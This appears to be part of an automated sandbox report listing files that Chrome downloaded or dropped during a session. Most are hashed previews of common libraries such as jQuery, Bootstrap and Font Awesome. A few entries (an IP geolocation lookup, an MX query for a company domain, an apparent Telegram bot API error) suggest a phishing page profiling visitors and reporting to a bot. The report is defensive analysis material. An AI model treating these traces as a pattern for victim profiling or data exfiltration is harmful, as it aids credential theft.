                                        Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):321
                                        Entropy (8bit):4.982434990202744
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6B7A647D1B9880C6686665F8D0AE141A
                                        SHA1:656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1
                                        SHA-256:24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
                                        SHA-512:85318BF359EC14F8D254988C99D250B9E3C36494E73078B97A47E886B6548E477531C88D78E38FB106E46724F24C134571B602FDEC6B1051E32B5FC917F8A1D1
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://ipinfo.io/json
                                        Preview:{. "ip": "8.46.123.228",. "hostname": "static-cpe-8-46-123-228.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text
                                        Category:downloaded
                                        Size (bytes):248
                                        Entropy (8bit):5.263368615858155
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9574C427831FF7B17F52EA4DB45A601E
                                        SHA1:991035543E1C832560A0B8F75473940584BC9079
                                        SHA-256:3BDFD889C85E9100D3B930345CB84E0A9AFEE37844A10EFF3CA509BD614950FF
                                        SHA-512:7AA1B1BB3AB928B78A13867FC17DB5EA00D6145A278D7A3EB602ED5951D253C3C9D6A24BF262F3D6DF761D8E7AD48D8053083E46B0593BE05B6B1211A8630DCF
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://copilotse.blob.core.windows.net/favicon.ico
                                        Preview:.<?xml version="1.0" encoding="utf-8"?><Error><Code>PublicAccessNotPermitted</Code><Message>Public access is not permitted on this storage account..RequestId:2f9cec91-601e-0057-6343-4aea25000000.Time:2024-12-09T14:05:56.4620054Z</Message></Error>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (32030)
                                        Category:dropped
                                        Size (bytes):86709
                                        Entropy (8bit):5.367391365596119
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E071ABDA8FE61194711CFC2AB99FE104
                                        SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                        SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                        SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):80
                                        Entropy (8bit):4.519265602280304
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3FA187421B5A45709B21C348556B4A6A
                                        SHA1:F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
                                        SHA-256:BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
                                        SHA-512:7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (14181)
                                        Category:downloaded
                                        Size (bytes):14265
                                        Entropy (8bit):5.155891752872181
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2EBF0D88E73A9C8D5E6D55A1A1CECA01
                                        SHA1:962359C8CD63A3F8436171AD46D97D9F29ABAC4D
                                        SHA-256:2B26394AAC8199778CD337D8046535B6EA9CB2DC698E4102029CA963E080E19F
                                        SHA-512:AAE1C2A7759B04D9302DF61431DF8AC01020A55BA426EE4C9DCB906965E00AB7E073108902AFDFA3EA2AAD128E8FE50A126C8C086DED6FC441EB75BE126ACE06
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://cdnjs.cloudflare.com/ajax/libs/axios/0.20.0/axios.min.js
                                        Preview:/* axios v0.20.0 | (c) 2020 by Matt Zabriskie */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new s(e),n=i(s.prototype.request,t);return o.extend(n,s.prototype,t),o.extend(n,t),n}var o=n(2),i=n(3),s=n(4),a=n(22),u=n(10),c=r(u);c.Axios=s,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefined"==typeof e}functi
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (19015)
                                        Category:downloaded
                                        Size (bytes):19188
                                        Entropy (8bit):5.212814407014048
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (13061)
                                        Category:downloaded
                                        Size (bytes):13493
                                        Entropy (8bit):5.223366920984251
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:43AB92573DB23CAD409FEE52BE4915A3
                                        SHA1:7167480166EAEFD9D7E3F2CED22E15A57D4789CC
                                        SHA-256:5756543ABC3CDB299ED8578412C39ABB2A6D50AA5376EA34877CF84B66AA356E
                                        SHA-512:69B30BC9EE3D6A881EFFFD825DFA29E50E0F85ADABE0912515CB5144E415C57629AC28DBE4B2E0C49A85975CC3B2F8A8A6C32A923C6F7B4CED6085A033440E8C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://kit.fontawesome.com/585b051251.js
                                        Preview:window.FontAwesomeKitConfig = {"id":132695554,"version":"5.15.4","token":"585b051251","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":true},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":false},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":false}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (60130)
                                        Category:downloaded
                                        Size (bytes):60312
                                        Entropy (8bit):4.72859504417617
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A12EC7EBE75A4D59A5DD6B79E2BA2E16
                                        SHA1:28F5DCC595EE6D4163481EF64170180502C8629B
                                        SHA-256:FC5128DFDCDFA0C3A9967A6D2F19399D7BF1AAAE6AD7571B96B03915A1F30DDA
                                        SHA-512:28B9EA5F3F95807259C2745162424ACEECAC2556BC1AB9A3B33E4E15B54C6970A4DF4A5892FE83C1155C82CA8D93AEBB173BE32F1A7F8B9D3CE038B2DD1E6FFE
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://ka-f.fontawesome.com/releases/v5.15.4/css/free.min.css?token=585b051251
                                        Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pul
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (32012)
                                        Category:downloaded
                                        Size (bytes):69597
                                        Entropy (8bit):5.369216080582935
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format (Version 2), TrueType, length 78168, version 331.-31196
                                        Category:downloaded
                                        Size (bytes):78168
                                        Entropy (8bit):7.996980715595138
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:A9FD1225FB2CD32320E2B931DCA01089
                                        SHA1:44EC5C6A868B4CE62350D9F040ED8E18F7A1D128
                                        SHA-256:C5DD43F53F3AF822CBF17B1FB75F46192CDBD51724F277ACF6CF0DACB3FD57E7
                                        SHA-512:58F45066D5738B1EF1F431EB9FC911FC9E6F61F60538F1577CD2EBE651BD8E7B87124DAE36C4E66FB303FD249EBA333BF41D316774201948CAD056BB0E4B4F2E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.woff2
                                        Preview:wOF2......1X..........0..K.$....................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u...m......6.........f%...N\!7.....w!......K..~.....DP)..V.u].5a..dQT1..#.bIIL&L=.....z....}4E.8..`..-..8..?....Xk.C..mV..`&...D."...V.c'.)......"/ .AD.4...i..S)e.72..@D "....~.Jj...~...so7r.....TK...P6..m5.>....1...=x...~.....mD...&.....4/.#[...v.U.,.3.O[aoy......f|.gKL..d.....e...P......c.j........H..../+d..Z....@.._....8.yk.0p.._~..g.C.:{..u.......h..n...I..%..#aD..$@....... ......'..G.89.*n...*._q.~....+]..uvX.r..!~n...7r.7*.9..6..7...`....=..j..~.:.......y..P.[.Q.7.../....J..j..B[`KliY.-m,.i..6.eW..^u]W7..qu.r..K.N..O..i9`H..0.!0.6............d..f......e.!,..oK....N:..-..X}..."....]..........j2....8.f5/b..n5..V.......d.C.....a.d!..,.../00).{y9V.W!..o.S.<..B>...mhH..%...X.....m~&....&.i.)`rS...."l..d......I.....B....;2Cb.SD........F..s.Z.S.Acb-.C.@..vj....=..Si...... .........i}._m..v.L..x..K.j_.v........]y...WV.B-{}1..E.9.{...9\.. .H..:svr..E_..q....._w...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (32065)
                                        Category:downloaded
                                        Size (bytes):85578
                                        Entropy (8bit):5.366055229017455
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):389
                                        Entropy (8bit):5.016732995081761
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8645C097E9731E50F79A861EA60A4587
                                        SHA1:174A617C8B7CC600DA6A634EDD74047412738FFB
                                        SHA-256:2538F61D25F0E60E15BF64CC6FBA19F723D25CFC565A18EA5FB8DCD978C03D6D
                                        SHA-512:E9243C3AD0335B92EDECC3D6B0191CEC47952FA8B39AF80E2CB476B1BE9B906B52B418B16A38FED2B25CCD8A05B63344EAA3A08B9C961FF93560F8CFC300DC41
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://dns.google/resolve?name=phillyshipyard.com&type=MX
                                        Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"phillyshipyard.com.","type":15}],"Answer":[{"name":"phillyshipyard.com.","type":15,"TTL":300,"data":"10 d217289b.ess.barracudanetworks.com."},{"name":"phillyshipyard.com.","type":15,"TTL":300,"data":"5 d217289a.ess.barracudanetworks.com."}],"Comment":"Response from ns1.linuxforce.net.(156.154.65.25)."}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48664)
                                        Category:downloaded
                                        Size (bytes):48944
                                        Entropy (8bit):5.272507874206726
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (50758)
                                        Category:dropped
                                        Size (bytes):51039
                                        Entropy (8bit):5.247253437401007
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (26500)
                                        Category:dropped
                                        Size (bytes):26682
                                        Entropy (8bit):4.82962335901065
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:76F34B71FC9FB641507FF6A822CC07F5
                                        SHA1:73ED2F8F21CD40FB496E61306ACBB5849D4DBFF4
                                        SHA-256:6DEA47458A4CD7CD7312CC780A53C62E0C8B3CCC8D0B13C1AC0EA6E3DFCECEA8
                                        SHA-512:6C4002CE78247B50BFA835A098980AF340E4E9F05F7097C1E83301289051CE1282E647ABAB87DB28A32FBFE0263C7318D2444B7D57875873908D6D5ED2AF882F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa.fa-glass:before{content:"\f000"}.fa.fa-meetup{font-family:"Font Awesome 5 Brands";font-weight:400}.fa.fa-star-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-file-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arrow-circle-o-down:before{content:"\f358"}.fa.fa-arrow-circle-o-up{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arro
                                        No static file info